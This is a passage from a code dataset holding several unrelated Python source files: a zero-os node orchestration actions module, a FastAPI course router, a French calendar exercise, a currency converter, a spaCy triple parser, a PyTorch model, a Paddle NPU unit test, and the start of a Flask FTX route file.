get_configuration(service.aysrepo)\n token = get_jwt_token(job.service.aysrepo)\n job.context['token'] = token\n\n install_action = service.model.actionsState['install']\n if install_action != 'ok' and install_action != 'error':\n return\n\n healthcheck_service = job.service.aysrepo.serviceGet(role='healthcheck',\n instance='node_%s' % service.name,\n die=False)\n if healthcheck_service is None:\n healthcheck_actor = service.aysrepo.actorGet('healthcheck')\n healthcheck_service = healthcheck_actor.serviceCreate(instance='node_%s' % service.name)\n service.consume(healthcheck_service)\n\n nodestatus = HealthCheckObject('nodestatus', 'Node Status', 'Node Status', '/nodes/{}'.format(service.name))\n\n node = Node.from_ays(service, token, timeout=5)\n state = node.is_running()\n\n if state:\n service.model.data.status = 'running'\n configured = 
node.is_configured(service.name)\n if not configured:\n service.executeAction('install', context=job.context)\n for consumer in service.getConsumersRecursive():\n consumer.self_heal_action('monitor')\n stats_collector_service = get_stats_collector(service)\n statsdb_service = get_statsdb(service)\n\n # Check if statsdb is installed on this node and start it if needed\n if (statsdb_service and str(statsdb_service.parent) == str(job.service)\n and statsdb_service.model.data.status != 'running'):\n statsdb_service.executeAction('start', context=job.context)\n\n # Check if there is a running statsdb and if so make sure stats_collector for this node is started\n if (stats_collector_service and stats_collector_service.model.data.status != 'running'\n and statsdb_service.model.data.status == 'running'):\n stats_collector_service.executeAction('start', context=job.context)\n\n # healthchecks\n nodestatus.add_message('node', 'OK', 'Node is running')\n update_healthcheck(job, healthcheck_service, node.healthcheck.openfiledescriptors())\n update_healthcheck(job, healthcheck_service, node.healthcheck.cpu_mem())\n update_healthcheck(job, healthcheck_service, node.healthcheck.rotate_logs())\n update_healthcheck(job, healthcheck_service, node.healthcheck.network_bond())\n update_healthcheck(job, healthcheck_service, node.healthcheck.interrupts())\n update_healthcheck(job, healthcheck_service, node.healthcheck.context_switch())\n update_healthcheck(job, healthcheck_service, node.healthcheck.threads())\n update_healthcheck(job, healthcheck_service, node.healthcheck.qemu_vm_logs())\n update_healthcheck(job, healthcheck_service, node.healthcheck.network_load())\n update_healthcheck(job, healthcheck_service, node.healthcheck.disk_usage())\n update_healthcheck(job, healthcheck_service, node.healthcheck.ssh_cleanup(job=job))\n\n flist = config.get('healthcheck-flist', 'https://hub.gig.tech/gig-official-apps/healthcheck.flist')\n with node.healthcheck.with_container(flist) as cont:\n update_healthcheck(job, healthcheck_service, node.healthcheck.node_temperature(cont))\n update_healthcheck(job, healthcheck_service, node.healthcheck.powersupply(cont))\n update_healthcheck(job, healthcheck_service, node.healthcheck.fan(cont))\n\n # check network stability of node with the rest of the nodes ! 
TODO\n else:\n if service.model.data.status != 'rebooting':\n service.model.data.status = 'halted'\n nodestatus.add_message('node', 'ERROR', 'Node is halted')\n update_healthcheck(job, healthcheck_service, nodestatus.to_dict())\n get_version(job)\n service.saveAll()\n\n\ndef update_healthcheck(job, health_service, healthchecks):\n import time\n\n service = job.service\n\n interval = service.model.actionGet('monitor').period\n new_healthchecks = list()\n if not isinstance(healthchecks, list):\n healthchecks = [healthchecks]\n defaultresource = '/nodes/{}'.format(service.name)\n for health_check in healthchecks:\n for health in health_service.model.data.healthchecks:\n # If this healthcheck already exists, update its attributes\n if health.id == health_check['id']:\n health.name = health_check.get('name', '')\n health.resource = health_check.get('resource', defaultresource) or defaultresource\n health.messages = health_check.get('messages', [])\n health.category = health_check.get('category', '')\n health.lasttime = time.time()\n health.interval = interval\n health.stacktrace = health_check.get('stacktrace', '')\n break\n else:\n # healthcheck doesn't exist in the current list, add it to the list of new\n health_check['lasttime'] = time.time()\n health_check['interval'] = interval\n new_healthchecks.append(health_check)\n\n old_healthchecks = health_service.model.data.to_dict().get('healthchecks', [])\n old_healthchecks.extend(new_healthchecks)\n health_service.model.data.healthchecks = old_healthchecks\n\n\ndef reboot(job):\n import time\n import redis\n from zeroos.orchestrator.sal.Node import Node\n from zeroos.orchestrator.configuration import get_jwt_token\n\n token = get_jwt_token(job.service.aysrepo)\n job.context['token'] = token\n service = job.service\n service._recurring_tasks['monitor'].stop()\n try:\n start = time.time()\n # Make sure any running monitor action finishes before we reboot\n while time.time() < start + 60:\n if not j.core.jobcontroller.db.jobs.list(\n actor='node.zero-os', action='monitor', state='running', service=service.name):\n break\n time.sleep(1)\n else:\n raise j.exceptions.RuntimeError('Failed to reboot node. Waiting for monitoring action for too long')\n\n force_reboot = service.model.data.forceReboot\n vms = service.consumers.get('vm') or []\n for vm in vms:\n if vm.model.data.status != 'halted':\n if not force_reboot:\n raise j.exceptions.RuntimeError(\n 'Failed to reboot node. 
Force reboot is not enabled and some vms are not halted')\n else:\n vm.executeAction('shutdown', context=job.context)\n service.model.data.status = 'rebooting'\n job.logger.info('reboot node {}'.format(service))\n node = Node.from_ays(service, job.context['token'])\n node.client.raw('core.reboot', {})\n finally:\n start = time.time()\n while time.time() < start + 10:\n try:\n node = Node.from_ays(service, token, timeout=5)\n node.client.testConnectionAttempts = 0\n node.client.ping()\n except (RuntimeError, ConnectionError, redis.TimeoutError, TimeoutError):\n break\n time.sleep(1)\n else:\n job.logger.info(\"Could not wait within 10 seconds for node to reboot\")\n service._recurring_tasks['monitor'].start()\n\n\ndef uninstall(job):\n from zeroos.orchestrator.configuration import get_jwt_token\n\n job.context['token'] = get_jwt_token(job.service.aysrepo)\n\n service = job.service\n stats_collector_service = get_stats_collector(service)\n if stats_collector_service:\n stats_collector_service.executeAction('uninstall', context=job.context)\n\n statsdb_service = get_statsdb(service)\n if statsdb_service and str(statsdb_service.parent) == str(service):\n statsdb_service.executeAction('uninstall', context=job.context)\n\n bootstraps = service.aysrepo.servicesFind(actor='bootstrap.zero-os')\n if bootstraps:\n bootstraps[0].executeAction('delete_node', args={'node_name': service.name})\n\n # Remove etcd_cluster if this was the last node service\n node_services = service.aysrepo.servicesFind(role='node')\n if len(node_services) > 1:\n return\n\n for etcd_cluster_service in service.aysrepo.servicesFind(role='etcd_cluster'):\n etcd_cluster_service.executeAction('delete', context=job.context)\n etcd_cluster_service.delete()\n\n\ndef watchdog(job):\n from zeroos.orchestrator.sal.Pubsub import Pubsub\n from zeroos.orchestrator.configuration import get_jwt_token\n from asyncio import sleep\n import asyncio\n import re\n import traceback\n\n service = job.service\n watched_roles = {\n 'nbdserver': {\n 'level': 20,\n 'message': (re.compile('.*'),),\n 'eof': True\n },\n 'tlogserver': {\n 'eof': True,\n },\n 'ork': {\n 'level': 20,\n 'instance': job.service.name,\n 'service': 'node',\n 'eof': False,\n 'message': (re.compile('.*'),),\n 'handler': 'ork_handler',\n },\n 'kvm': {\n 'level': 20,\n 'instance': job.service.name,\n 'service': 'node',\n 'eof': False,\n 'message': (re.compile('.*'),),\n 'handler': 'vm_handler',\n 'sub_id': 'events',\n },\n 'cloudinit': {\n 'eof': True,\n },\n 'http': {\n 'eof': True,\n },\n 'dhcp': {\n 'eof': True,\n },\n 'storage_engine': {\n 'eof': True,\n },\n \"etcd\": {\n \"eof\": True,\n },\n 'stats_collector': {\n 'eof': True,\n },\n 'zerostor': {\n 'eof': True,\n },\n 'container': {\n \"eof\": True,\n },\n }\n\n async def callback(jobid, level, message, flag):\n if '.' 
not in jobid:\n return\n\n role, sub_id = jobid.split('.', 1)\n if (role not in watched_roles or\n watched_roles[role].get('level', level) != level\n or watched_roles[role].get('sub_id', sub_id) != sub_id):\n return\n\n service_role = watched_roles[role].get('service', role)\n instance = watched_roles[role].get('instance', sub_id)\n\n eof = flag & 0x6 != 0\n\n valid_message = False\n matched_messages = watched_roles[role].get('message', ())\n for msg in matched_messages:\n if msg.match(message):\n valid_message = True\n\n if not valid_message and not (watched_roles[role]['eof'] and eof):\n return\n\n srv = service.aysrepo.serviceGet(role=service_role, instance=instance, die=False)\n if srv:\n args = {'message': message, 'eof': eof, 'level': level}\n job.context['token'] = get_jwt_token(job.service.aysrepo)\n handler = watched_roles[role].get('handler', 'watchdog_handler')\n await srv.asyncExecuteAction(handler, context=job.context, args=args)\n\n async def check_node(job):\n job.context['token'] = get_jwt_token(job.service.aysrepo)\n try:\n cl = Pubsub(service._loop, service.model.data.redisAddr, password=job.context['token'], callback=callback)\n await cl.ping()\n service.model.data.status = 'running'\n except (RuntimeError, OSError) as e:\n service.model.data.status = 'halted'\n\n async def streaming(job):\n # Check if the node is runing\n while service.model.actionsState['install'] != 'ok':\n await sleep(5)\n\n while str(service.model.data.status) != 'running':\n await sleep(5)\n\n # Add the looping here instead of the pubsub sal\n cl = None\n subscribed = None\n\n while True:\n if str(service.model.data.status) != 'running':\n await sleep(5)\n continue\n if cl is None:\n job.context['token'] = get_jwt_token(job.service.aysrepo)\n cl = Pubsub(service._loop, service.model.data.redisAddr, password=job.context['token'], callback=callback)\n\n try:\n if not subscribed:\n queue = await cl.subscribe('ays.monitor')\n subscribed = True\n await cl.global_stream(queue)\n except asyncio.TimeoutError as e:\n job.logger.error(e)\n await check_node(job)\n cl = None\n subscribed = None\n except OSError as e:\n job.logger.error(e)\n await check_node(job)\n cl = None\n subscribed = None\n except RuntimeError as e:\n job.logger.error(e)\n await check_node(job)\n cl = None\n subscribed = None\n except Exception as e:\n job.logger.error(traceback.format_exc())\n await check_node(job)\n cl = None\n subscribed = None\n\n return streaming(job)\n\n\ndef nic_shutdown(job, message):\n from zeroos.orchestrator.sal.Node import Node\n from zeroos.orchestrator.configuration import get_jwt_token\n\n service = job.service\n node = Node.from_ays(service, get_jwt_token(service.aysrepo))\n interface = message['name']\n\n if interface.startswith('cont'):\n container_id = interface.split('-')[0].replace('cont', '')\n for container in node.containers.list():\n if str(container.id) == container_id:\n container_service = service.aysrepo.serviceGet(role='container', instance=container.name)\n container_service.model.data.status = 'networkKilled'\n container_service.saveAll()\n return\n else:\n vms = node.client.kvm.list()\n for vm in vms:\n if interface in vm['ifctargets']:\n vm_service = service.aysrepo.serviceGet(role='vm', instance=vm['name'])\n vm_service.model.data.status = 'networkKilled'\n vm_service.saveAll()\n return\n\n job.logger.info('Failed to find vm/container interface matching %s' % interface)\n\n\ndef ork_handler(job):\n import json\n from zeroos.orchestrator.utils import send_event\n\n message = 
job.model.args.get('message')\n if not message:\n return\n\n message = json.loads(message)\n send_event('ork', message, job.service.aysrepo)\n\n if message['event'] == 'NIC_SHUTDOWN':\n nic_shutdown(job, message)\n elif message['event'] == 'VM_QUARANTINE' and message['state'] == 'WARNING':\n job.logger.info('VM %s exceeded cpu threshold and will be quarantined soon' % message['name'])\n elif message['event'] == 'VM_QUARANTINE' and message['state'] == 'SUCCESS':\n job.logger.info('Vm %s has been quarantined' % message['name'])\n elif message['event'] == 'VM_UNQUARANTINE' and message['state'] == 'SUCCESS':\n job.logger.info('Vm %s has been released from quarantine' % message['name'])\n\n\ndef start_vm(job, vm):\n import asyncio\n from zeroos.orchestrator.configuration import get_jwt_token\n\n if vm.model.data.status == 'running':\n job.context['token'] = get_jwt_token(job.service.aysrepo)\n\n asyncio.ensure_future(vm.asyncExecuteAction('start', context=job.context), loop=job.service._loop)\n\n\ndef shutdown_vm(job, vm):\n import asyncio\n from zeroos.orchestrator.configuration import get_jwt_token\n\n if vm.model.data.status == 'running':\n job.context['token'] = get_jwt_token(job.service.aysrepo)\n asyncio.ensure_future(vm.asyncExecuteAction('shutdown', context=job.context), loop=job.service._loop)\n\n\ndef vm_handler(job):\n import json\n import asyncio\n\n message = job.model.args.get('message')\n if not message:\n return\n\n message = json.loads(message)\n vm = job.service.aysrepo.serviceGet(role='vm', instance=message['name'])\n if not vm:\n return\n\n if message['event'] == 'stopped' and message['detail'] == 'failed':\n asyncio.ensure_future(start_vm(job, vm))\n\n if message['event'] == 'stopped' and message['detail'] == 'shutdown':\n asyncio.ensure_future(shutdown_vm(job, vm))\n\n\ndef processChange(job):\n service = job.service\n args = job.model.args\n node_data = service.model.data.to_dict()\n if 'forceReboot' in args and node_data.get('forceReboot') != args['forceReboot']:\n service.model.data.forceReboot = args['forceReboot']\n service.saveAll()\n","repo_name":"0xIslamTaha/0-orchestrator","sub_path":"templates/node.zero-os/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":20936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"5471695131","text":"# from . 
import schemas, models\nfrom sqlalchemy.orm import Session\nfrom fastapi import Depends, HTTPException, status, APIRouter, Response\nfrom typing import Optional, List\n\nfrom models.index import get_db, Course\nfrom schemas.course import Course as SCourse, CoursePost, CoursePostResponse, CourseTutor, CourseQuestion\nfrom auth import auth\n\n\nrouter = APIRouter()\n\n\n@router.get(\"\", response_model=List[CourseTutor], status_code=200)\ndef get_courses(db: Session = Depends(get_db)):\n courses = db.query(Course).all()\n return courses\n\n\n@router.get(\"/{id}\", response_model=SCourse, status_code=status.HTTP_200_OK)\ndef get_course(id: int, db: Session = Depends(get_db)):\n course = db.query(Course).filter(Course.id == id).first()\n if course is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=\"Course with ID doesn't exist\",\n )\n return course\n\n\n\n@router.get(\"/{id}/questions\", response_model=CourseQuestion, status_code=status.HTTP_200_OK)\ndef get_course_questions(id: int, db: Session = Depends(get_db)):\n course = db.query(Course).filter(Course.id == id).first()\n if course is None:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=\"Course with ID doesn't exist\",\n )\n return course\n\n \n\n\n@router.post(\"\", response_model=CoursePostResponse, status_code=status.HTTP_201_CREATED)\n# @router.post(\"\", status_code=status.HTTP_201_CREATED)\ndef create_course(\n course: CoursePost, auth=Depends(auth), db: Session = Depends(get_db)\n):\n # return auth\n if auth.role != \"tutor\":\n raise HTTPException(\n status_code=403, detail=\"You have to be a tutor to create a course\"\n )\n\n course.tutor_id = auth.id\n db_course = db.query(Course).filter(Course.name == course.name).first()\n # return auth\n if db_course is not None:\n raise HTTPException(status_code=400, detail=\"Course with name already exists\")\n\n new_course = Course(**course.dict())\n\n db.add(new_course)\n db.commit()\n\n return new_course\n\n\n# @router.put('/{id}',response_model=SCourse,status_code=status.HTTP_200_OK)\n# def update_course(id:int, course:SCourse, db: Session = Depends(get_db)):\n# db_course=db.query(Course).filter(Course.id==id).first()\n# # db_course.email=course.email\n# # db_course.firstname=course.firstname\n# # db_course.lastname=course.lastname\n# db_course.phone = course.phone\n\n# db.commit()\n\n# return db_course\n","repo_name":"leyume/learnducate","sub_path":"backend/app/routes/courses.py","file_name":"courses.py","file_ext":"py","file_size_in_byte":2509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24844461810","text":"from math import sqrt\n\n\ndef reverse_list(s):\n print(type(s), s)\n temp_list = list(s)\n print(type(temp_list), temp_list)\n test = temp_list.reverse()\n print(temp_list)\n print(type(test))\n return ''.join(temp_list)\n\n\nword = \"oki\"\n# print(reverse_list(word))\n\ntab = ['test', 'oki', 'doki']\ntab.reverse()\ntesttab = tab\n# print(testtab)\n\n# *---------------------------------------\n# Al-Khwarizmi\nbu_s = 14\nbu_n = 20\nbu_o = 1775\n\nroot = 34\nnum = 40*1775\n\nmid_root = root/2\nresult_by_self = mid_root*mid_root\nresult = result_by_self+num\nnew_result = sqrt(result)\nfinish = new_result - mid_root\n# print(finish)\n\n# *------------------------------------------------\n# *Calendar\n# TODO :\n# we are given the list of month names, the list of month lengths, the year, and the first day of the year in the form:\n# 0 for Monday\n# 1 for 
Tuesday\n# ...\n# 6 for Sunday\npremier_jour = 0\nannee = 2023\nmois_j = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\nmois_n = [\"jan\", \"fev\", \"mar\", \"avr\", \"mai\", \"jun\",\n \"jul\", \"aou\", \"sep\", \"oct\", \"nov\", \"dec\"]\nlist_j = [\"lu\", \"ma\", \"me\",\n \"je\", \"ve\", \"sa\", \"di\"]\n# *-----------------------------\n# adjust the list of month lengths for the case of a leap year\nmois_bis = [31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n# *-------------------------------------\n# print the 365 day numbers...\n# one after another (1 2 3 4 ... 31 1 2 3 ... 28 ... 1 2 3 ... 31 1 2 ... 31)\n# without trying to group them, just the days one after the other, over 365 lines..\n# for j in range(len(mois_n)):\n# for i in range((mois_j[j])):\n# if i % 7 == 0:\n# print(end=\"\\n\")\n# print(i+1, \"\", end=\"\")\n# print(\"\", end=\"\\n\")\n# *-----------------------------------\n# same thing as above, starting a new line every 7 days:\n# print(4) : moves to the next line\n# print(5, end=\"\") : does not move to the next line\n# the result still doesn't look like much... but we're getting there\n# *-----------------------------------\n# we can now add a rudimentary separator such as \"----------------------\"\n# as well as the month name, and a header line: print(\"lun mar mer jeu ven sam dim\")\nfirst_day = 0\nfor j in range(len(mois_n)):\n print(\" \", mois_n[j])\n print(\" \".join(list_j), end=\"\\n\")\n if first_day > 0:\n for x in range(first_day):\n print(\" \", end=\"\")\n for i in range((mois_j[j])):\n # print(i+first_day)\n if (i+first_day) % 7 == 0:\n print(end=\"\\n\")\n if (i < 10):\n print(i+1, \" \", end=\"\")\n elif (i >= 10):\n print(i+1, \"\", end=\"\")\n print(\"\", end=\"\\n\")\n print('---------')\n # print(mois_j[j]-28)\n first_day = mois_j[j]-28\n# *-----------------------------------\n# how do we start a month?\n# we will \"offset\"\n# let's just try with a 31-day test month\n# jours = [x+1 for x in range(31)]\n# print(jours)\n\n\noffset = 3 # the month starts on a Thursday\n# Monday = 0 , Tuesday = 1 ... 
Sunday = 6\n# we can use format\n# *-----------------------------------\n# computing the next month's offset\noffset = 3\njours = 31\n\n\n# print(new_offset)\n# *-----------------------------------\n# let's take all of that again.\npremier_jour = 0\nmois_j = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\nmois_n = [\"jan\", \"fev\", \"mar\", \"avr\", \"mai\", \"jun\",\n \"jul\", \"aou\", \"sep\", \"oct\", \"nov\", \"dec\"]\n# *-----------------------------------\n# we write a function affiche_mois() which takes as parameters:\n# the month number (1 to 12)\n# the offset\n# and which returns the new offset\n\n\ndef affiche_mois(indice, offset):\n return\n# *-----------------------------------\n# we use affiche_mois to display months 1 to 12.\n","repo_name":"Pierre-OlivierB/ibm-python-day3","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3764,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2977567539","text":"import requests\nimport json\n\n# Get input currency from user.\ncurrent_code = input().lower()\n\n# Create a cache dictionary for used rates.\ncache = {'usd': 0, 'eur': 0}\n\n# Loop for continue checking.\nwhile True:\n target_code = input().lower()\n if not target_code:\n break\n money = int(input())\n\n # Get currency rates from server.\n response = requests.get(f\"http://www.floatrates.com/daily/{current_code}.json\")\n json_str = response.content.decode('utf-8')\n rates_json = json.loads(json_str)\n\n # Cache desired results\n rates = ['usd', 'eur']\n for r in rates:\n try:\n cache[r] = rates_json[r]['rate']\n except KeyError:\n continue\n\n # Convert money and print result.\n print(\"Checking the cache...\")\n if target_code in cache:\n print(\"Oh! It is in the cache!\")\n rate = cache[target_code]\n else:\n print(\"Sorry, but it is not in the cache!\")\n # Update cache with new code retrieved.\n rate = rates_json[target_code]['rate']\n cache[target_code] = rate\n \n conv_money = round(money * rate, 2)\n print(f\"You received {conv_money} {target_code.upper()}.\")\n\n\n\n","repo_name":"facufrau/beginner-projects-solutions","sub_path":"hyperskill_projects/currency_converter/currency_converter-6-6.py","file_name":"currency_converter-6-6.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"32831771211","text":"\"\"\"\nCreate Parser object that can Parse Question and Document\n\"\"\"\nimport spacy\nfrom spacy.tokens import Span\nfrom spacy.matcher import PhraseMatcher, Matcher\nimport inflect\nimport re\n\nclass Parser(object):\n def __init__(self, text, custom_pipe):\n self.text = text\n self.nlp = custom_pipe.nlp\n\n def docParse(self):\n \"\"\"\n To parse the whole document, but only for simple sentences at the moment.\n Return a list of triples of Subject-Verb-Object (SVO)\n \"\"\"\n text = self.text\n text = self.simplify(text)\n nlp = self.nlp\n full_doc = nlp(text)\n \n # Split into sentences and find Simple sentences\n sent_doc_ls = list(sent for sent in full_doc.sents)\n spl_ls = self.simple_find(sent_doc_ls)\n doc_ls = list(nlp.pipe(spl_ls))\n\n print(\"Finding triples (Subject-Verb-Object) from your doc...\\n\")\n # Our triples will be (ent1, rel, ent2)\n triples = self.all_triples(doc_ls) \n return triples\n\n def questionParse(self):\n \"\"\"\n To parse question only. 
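Entities come from the spaCy NER pipe (doc.ents); relations come from the rule-based Matcher in get_relation below.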
\n Return a set of entities ents_set and a set of relations rels_set\n \"\"\"\n text = self.text\n text = text.lower()\n nlp = self.nlp\n doc = nlp(text)\n print(\"Finding entities set and relations set...\\n\")\n ents_set = set(str(ent) for ent in doc.ents)\n rels_list = self.get_relation(doc)\n rels_set = set(str(rel[-1]) for rel in rels_list)\n return ents_set, rels_set\n\n def get_relation(self, doc):\n \"\"\"\n Parsing a doc object to find the Relations (\"key verbs\")\n Return a list of relation tuples (start, relation)\n \"\"\"\n nlp = self.nlp\n # Matcher class object \n matcher = Matcher(nlp.vocab)\n\n #define the pattern (both patterns will be looking for a VERB followed by a PREPOSITION)\n ROOT_pattern = [{'DEP':'ROOT'}, \n {'DEP':'prep','OP':\"?\"},\n {'DEP':'agent','OP':\"?\"},\n {'DEP':'acomp','OP':\"?\"},\n ] \n\n acl_pattern = [{'DEP':'acl'}, \n {'DEP':'prep','OP':\"?\"},\n {'DEP':'agent','OP':\"?\"},\n {'DEP':'acomp','OP':\"?\"},\n ]\n\n relations = []\n matcher.add(\"relations\", None, ROOT_pattern, acl_pattern)\n # After the matcher is added, let's run on our Doc to see what it can find\n matches = matcher(doc)\n\n # Store it in the relations list\n for match_id, start, end in matches:\n matched_span = doc[start:end]\n relation_tuple = (start, matched_span.lemma_)\n relations.append(relation_tuple)\n\n # Check if there is duplication, we will remove the duplication\n # Examples: \"determine\" and \"determine by\" will both be relations but we only need the longer one\n for start, relation1 in relations:\n if len(relation1.split()) != 1:\n continue\n else:\n # comparing our 1st relation to our 2nd relation \n for _, relation2 in relations:\n # if 2nd relation also 1 word, won't be a duplicate\n if len(relation2.split()) == 1:\n continue\n # if 1st relation is a substring of 2nd relation --> duplicate\n if relation2.find(relation1) != -1:\n relations.remove((start, relation1))\n break\n return relations\n\n def simplify(self, text):\n \"\"\"\n Remove all 'a', 'the' from the text since this is not important to build the KG.\n Also remove '\\n' and '=' which are used to format the sub-headings\n Also turn all to lowercase.\n Also remove all texts within brackets (those adding extra information)\n Also clean up 'he she we they this these those that' since we have not yet found a way to parse earlier info.\n \"\"\"\n text = text.lower()\n to_replace_with_space = [' a ', ' the ', ' he ', ' she ', ' we ', ' they ', ' this ', ' that ', ' these ', ' those ']\n to_remove = ['\\n', '=']\n source = text\n source = re.sub(\" [\\(\\[].*?[\\)\\]]\", \"\", source)\n source = re.sub(\"[=].*? [=]\", \"\", source)\n for dummy in to_remove:\n source = source.replace(dummy, '')\n # clean up period as this punctuation gets a bit messy after all the previous replacements\n n = 3\n for i in range(n):\n dummy = '.' + ' '*(n-i)\n source = source.replace(dummy, '.')\n source = source.replace('.', '. 
')\n for dummy in to_replace_with_space:\n source = source.replace(dummy, ' ')\n return source\n \n def simple_find(self, doc_ls):\n \"\"\"\n Only to find Simple sentences to parse.\n Currently ignore Compound and Complex sentences\n Return a list of string object for Simple sentence spl_text_ls.\n \"\"\"\n spl_text_ls = []\n\n for doc in doc_ls:\n is_simple = False\n nsubj_tok = [tok for tok in doc if tok.dep_ == \"nsubj\" or tok.dep_ == \"nsubjpass\"]\n mark_tok = [tok for tok in doc if tok.dep_ == \"mark\"]; \n\n if len(nsubj_tok) == 1 and len(mark_tok) == 0:\n is_simple = True\n\n if is_simple == True:\n spl_text_ls.append(doc.string.strip())\n\n return spl_text_ls\n\n def all_triples(self, doc_ls):\n \"\"\"\n Find all triples from the document object\n Return a list of triples\n \"\"\"\n triples = []\n for doc in doc_ls:\n ent_rel_list = self.ordered_entity_relation(doc)\n triple = self.find_triple(ent_rel_list)\n triples += triple \n return triples\n\n def ordered_entity_relation(self, doc):\n '''\n Parse a `doc` object and return entities and the relations between them in order\n '''\n ent_list = []; relation_list = []\n for ent in doc.ents:\n ent_tuple = (ent.end - 1, ent.lemma_, \"ents\")\n ent_list.append(ent_tuple)\n\n relations = self.get_relation(doc)\n for start, relation in relations:\n relation_tuple = (start, relation, \"rels\")\n relation_list.append(relation_tuple)\n\n combined_list = ent_list + relation_list\n ordered_list = sorted(combined_list, key=lambda x: x[0])\n # check ordered list for tuple of ents follow by rels:\n # if ents.end >= rels.start, False, remove relations\n n = len(ordered_list)\n remove_list = []\n for i in range(n-1):\n tuple1 = ordered_list[i]\n tuple2 = ordered_list[i+1]\n if tuple1[-1] == 'ents' and tuple2[-1] == 'rels':\n if tuple1[0] >= tuple2[0]:\n remove_list.append(tuple2)\n for trash in remove_list:\n ordered_list.remove(trash)\n ordered_list = sorted(ordered_list, key=lambda x: x[0])\n return ordered_list\n\n\n def find_triple(self, ent_rel_list):\n '''\n Filter only entities that have relation between them. 
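A triple is any run of three consecutive items in the ordered list that matches the pattern entity, relation, entity.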
Return a list of tuples of (ent1, rel, ent2).\n This is hardcoded and only works well for simple sentences.\n '''\n l = len(ent_rel_list)\n span = 3\n triple = []\n\n for i in range(l-span+1):\n ind1 = ent_rel_list[i]\n ind2 = ent_rel_list[i + 1]\n ind3 = ent_rel_list[i + 2]\n\n if ind1[-1] == 'ents' and ind2[-1] == 'rels' and ind3[-1] == 'ents':\n triple_tuple = (ind1[1], ind2[1], ind3[1])\n triple.append(triple_tuple)\n\n return triple","repo_name":"TNBL265/NLPQueryBot","sub_path":"QueryParserApp/KeywordsParser.py","file_name":"KeywordsParser.py","file_ext":"py","file_size_in_byte":7717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10571459142","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass ScalarModel(nn.Module):\n def __init__(self, input_size, hidden_size):\n super(ScalarModel, self).__init__()\n self.loss = nn.MSELoss(reduction=\"none\")\n\n self.fc1 = nn.Linear(input_size, hidden_size)\n self.fc2 = nn.Linear(hidden_size, hidden_size)\n self.fc3 = nn.Linear(hidden_size, 1)\n\n def forward(self, x):\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n","repo_name":"Kabumba/PhysicsLearner","sub_path":"ScalarModel.py","file_name":"ScalarModel.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16835500747","text":"from __future__ import print_function, division\n\nimport numpy as np\nimport unittest\nimport sys\nsys.path.append(\"..\")\nfrom op_test import OpTest, skip_check_grad_ci\nimport paddle\npaddle.enable_static()\n\n\nclass TestNPUReciprocal(OpTest):\n def setUp(self):\n self.op_type = \"reciprocal\"\n self.set_npu()\n self.init_dtype()\n\n np.random.seed(1024)\n x = np.random.uniform(1, 2, [11, 17]).astype(self.dtype)\n out = np.reciprocal(x)\n\n self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}\n self.outputs = {'Out': out}\n\n def test_check_output(self):\n self.check_output_with_place(self.place)\n\n def test_check_grad(self):\n self.check_grad_with_place(\n self.place, ['X'], 'Out', max_relative_error=0.01)\n\n def set_npu(self):\n self.__class__.use_npu = True\n self.place = paddle.NPUPlace(0)\n\n def init_dtype(self):\n self.dtype = np.float32\n\n\nclass TestNPUReciprocalFp64(TestNPUReciprocal):\n def set_npu(self):\n self.__class__.use_npu = True\n self.place = paddle.NPUPlace(0)\n\n def init_dtype(self):\n self.dtype = np.float64\n\n\n@skip_check_grad_ci(\n reason=\"The backward test is not supported for float16 type on NPU.\")\nclass TestNPUReciprocalFp16(TestNPUReciprocal):\n def set_npu(self):\n self.__class__.use_npu = True\n self.place = paddle.NPUPlace(0)\n self.__class__.no_need_check_grad = True\n\n def init_dtype(self):\n self.dtype = np.float16\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"EnnSou/ooss-paddle2.3","sub_path":"python/paddle/fluid/tests/unittests/npu/test_reciprocal_op_npu.py","file_name":"test_reciprocal_op_npu.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"33456093454","text":"from flask import Blueprint, jsonify\n\nfrom services.ftx import list_markets, get_price\n\nftx_bp = Blueprint('ftx_bp', __name__)\n\n\n@ftx_bp.route('/')\ndef list_market():\n stocks = list_markets()\n return jsonify(stocks['result'])\n\n\n@ftx_bp.route('/<market>')\ndef get_market(market):\n market = 
